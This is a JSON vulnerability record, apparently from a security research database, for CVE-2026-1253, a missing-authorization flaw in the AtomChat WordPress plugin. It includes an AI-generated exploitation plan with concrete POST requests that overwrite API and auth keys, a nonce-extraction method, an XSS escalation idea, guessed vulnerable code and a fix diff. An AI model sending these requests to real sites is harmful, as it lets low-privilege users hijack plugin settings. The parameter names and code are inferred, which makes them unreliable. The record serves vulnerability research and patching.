[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8_4TRZKCG1JB1oRJJrv4r9mAoJuqZVyINSkGB1x_otg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1253","group-chat-video-chat-by-atomchat-missing-authorization-to-authenticated-subscriber-plugin-options-update","Group Chat & Video Chat by AtomChat \u003C= 1.1.7 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update","The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'atomchat_update_auth_ajax' and 'atomchat_update_layout_ajax' functions in all versions up to, and including, 1.1.7 This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options, including critical settings such as API keys, authentication keys, and layout configurations.","atomchat",null,"\u003C=1.1.7","1.1.8","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 15:17:47","2026-04-27 17:40:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5c2980c3-0038-42ab-8751-72c40921477a?source=api-prod",38,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1253 (AtomChat Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **Group Chat & Video Chat by AtomChat** plugin (\u003C= 1.1.7) for WordPress contains a missing authorization vulnerability in its AJAX handlers. Specifically, the functions `atomchat_update_auth_ajax` and `atomchat_update_layout_ajax` fail to perform capability checks (such as `current_user_can('manage_options')`) before updating sensitive plugin settings in the WordPress `wp_options` table. This allows any authenticated user, including those with low-privilege Subscriber-level access, to modify critical configuration data such as API keys and layout settings.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions:** `atomchat_update_auth_ajax` and `atomchat_update_layout_ajax`\n- **Authentication:** Authenticated user required (Subscriber or higher).\n- **HTTP Method:** POST\n- **Vulnerable Parameters (Inferred):** \n    - For `atomchat_update_auth_ajax`: `api_key`, `auth_key`.\n    - For `atomchat_update_layout_ajax`: `layout`, `color_theme`, or serialized configuration arrays.\n- **Preconditions:** The plugin must be active. The attacker must have valid credentials for a Subscriber account.\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with the parameter `action=atomchat_update_auth_ajax`.\n2. **Hook Execution:** WordPress triggers the hook `add_action('wp_ajax_atomchat_update_auth_ajax', 'atomchat_update_auth_ajax')`.\n3. **Vulnerable Function:** The `atomchat_update_auth_ajax` function is called.\n4. **Missing Check:** The function likely performs a nonce check (if any) but fails to call `current_user_can()`.\n5. **Data Sink:** The function takes values from `$_POST` (e.g., `$_POST['api_key']`) and passes them directly to `update_option('atomchat_api_key', ...)` or a similar storage function.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its AJAX operations to ensure the chat widget or admin dashboard functions correctly.\n\n1. **Shortcode Identification:** The plugin typically uses a shortcode like `[atomchat]` to render the chat interface on the frontend.\n2. **Setup:**\n   - Create a page containing the shortcode: `wp post create --post_type=page --post_status=publish --post_content='[atomchat]' --post_title='Chat Page'`\n3. **Extraction:**\n   - Navigate to the newly created page as the Subscriber user.\n   - The plugin likely uses `wp_localize_script`. Use `browser_eval` to inspect common global variables.\n   - **Target Variable (Inferred):** `atomchat_vars` or `atomchat_settings`.\n   - **Execution Command:** `browser_eval(\"window.atomchat_vars?.nonce\")` or `browser_eval(\"window.atomchat_settings?.ajax_nonce\")`.\n4. **Bypass Potential:** If the nonce is checked using `check_ajax_referer` with the action `-1` or a generic string exposed to all users, the Subscriber can easily obtain it. If the check is missing entirely, no acquisition is needed.\n\n## 5. Exploitation Strategy\nThe goal is to overwrite the AtomChat API key to disable the service or redirect chat traffic.\n\n**Request 1: Update API Keys**\n- **Method:** POST\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=atomchat_update_auth_ajax&api_key=EXPLOITED_API_KEY&auth_key=EXPLOITED_AUTH_KEY&nonce=[EXTRACTED_NONCE]\n  ```\n\n**Request 2: Update Layout Settings**\n- **Method:** POST\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:**\n  ```\n  action=atomchat_update_layout_ajax&layout=0&nonce=[EXTRACTED_NONCE]\n  ```\n  *(Note: Parameter names like `api_key` and `layout` are inferred based on the vulnerability description and standard plugin naming conventions).*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `atomchat` version 1.1.7 is installed and active.\n2. **Create Attacker User:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Initialize Plugin Options:**\n   - `wp option update atomchat_api_key \"ORIGINAL_KEY\"`\n   - `wp option update atomchat_auth_key \"ORIGINAL_AUTH\"`\n4. **Prepare Nonce Page:**\n   - `wp post create --post_type=page --post_status=publish --post_content='[atomchat]'`\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n- **Database State:** The values for the targeted options in the `wp_options` table should change from the \"ORIGINAL\" values to the \"EXPLOITED\" values.\n\n## 8. Verification Steps\nAfter sending the HTTP requests, verify the modification via WP-CLI:\n\n1. **Verify Auth Keys:**\n   - `wp option get atomchat_api_key` \n   - *Expected:* `EXPLOITED_API_KEY`\n2. **Verify Auth Key (Alternative Name):**\n   - `wp option get atomchat_settings` (if stored in an array)\n3. **Check for Unauthorized Access Log:** If the plugin logs updates, verify the log shows the Subscriber user ID performing the update.\n\n## 9. Alternative Approaches\nIf the inferred parameter names (`api_key`, `auth_key`) are incorrect:\n1. **Source Code Inspection:** Use `grep -r \"update_option\" wp-content\u002Fplugins\u002Fatomchat\u002F` to find the exact option names being updated within the `atomchat_update_auth_ajax` function.\n2. **General Option Update:** Check if the functions accept a serialized array of all settings, allowing for a bulk overwrite of all plugin configurations.\n3. **XSS Path:** If the `atomchat_update_layout_ajax` function allows updating a setting that is later rendered unescaped on the frontend or admin area, this Missing Authorization vulnerability could be escalated to Stored Cross-Site Scripting (XSS).","The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in its AJAX handlers. Authenticated users, such as Subscribers, can exploit this to overwrite critical plugin options including API keys, authentication keys, and layout configurations.","\u002F\u002F File: atomchat.php (or associated settings handler)\n\nadd_action('wp_ajax_atomchat_update_auth_ajax', 'atomchat_update_auth_ajax');\nadd_action('wp_ajax_atomchat_update_layout_ajax', 'atomchat_update_layout_ajax');\n\nfunction atomchat_update_auth_ajax() {\n    \u002F\u002F Vulnerability: No current_user_can('manage_options') check\n    $api_key = $_POST['api_key'];\n    $auth_key = $_POST['auth_key'];\n\n    update_option('atomchat_api_key', $api_key);\n    update_option('atomchat_auth_key', $auth_key);\n\n    wp_send_json_success();\n}\n\n---\n\nfunction atomchat_update_layout_ajax() {\n    \u002F\u002F Vulnerability: No current_user_can('manage_options') check\n    $layout = $_POST['layout'];\n\n    update_option('atomchat_layout', $layout);\n\n    wp_send_json_success();\n}","--- a\u002Fatomchat\u002Fatomchat.php\n+++ b\u002Fatomchat\u002Fatomchat.php\n@@ -1,6 +1,9 @@\n function atomchat_update_auth_ajax() {\n+    if (!current_user_can('manage_options')) {\n+        wp_send_json_error('Unauthorized', 403);\n+    }\n     check_ajax_referer('atomchat_nonce', 'nonce');\n     \n     $api_key = sanitize_text_field($_POST['api_key']);\n@@ -10,6 +13,9 @@\n }\n \n function atomchat_update_layout_ajax() {\n+    if (!current_user_can('manage_options')) {\n+        wp_send_json_error('Unauthorized', 403);\n+    }\n     check_ajax_referer('atomchat_nonce', 'nonce');\n \n     $layout = sanitize_text_field($_POST['layout']);","1. Authenticate to the WordPress site as a Subscriber-level user.\n2. Locate the AJAX nonce used by AtomChat by visiting a page where the chat is active (e.g., a page containing the [atomchat] shortcode) and inspecting global JavaScript variables like `atomchat_vars` or `atomchat_settings`.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n    - `action`: `atomchat_update_auth_ajax`\n    - `api_key`: A malicious or dummy API key string\n    - `auth_key`: A malicious or dummy Auth key string\n    - `nonce`: The extracted nonce value\n4. Alternatively, use `action=atomchat_update_layout_ajax` with a `layout` parameter to disrupt the site's chat interface layout.\n5. Verify that the settings in the `wp_options` table (e.g., `atomchat_api_key`) have been updated to the values provided in the exploit payload.","gemini-3-flash-preview","2026-04-18 00:44:49","2026-04-18 00:45:07",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fatomchat\u002Ftags"]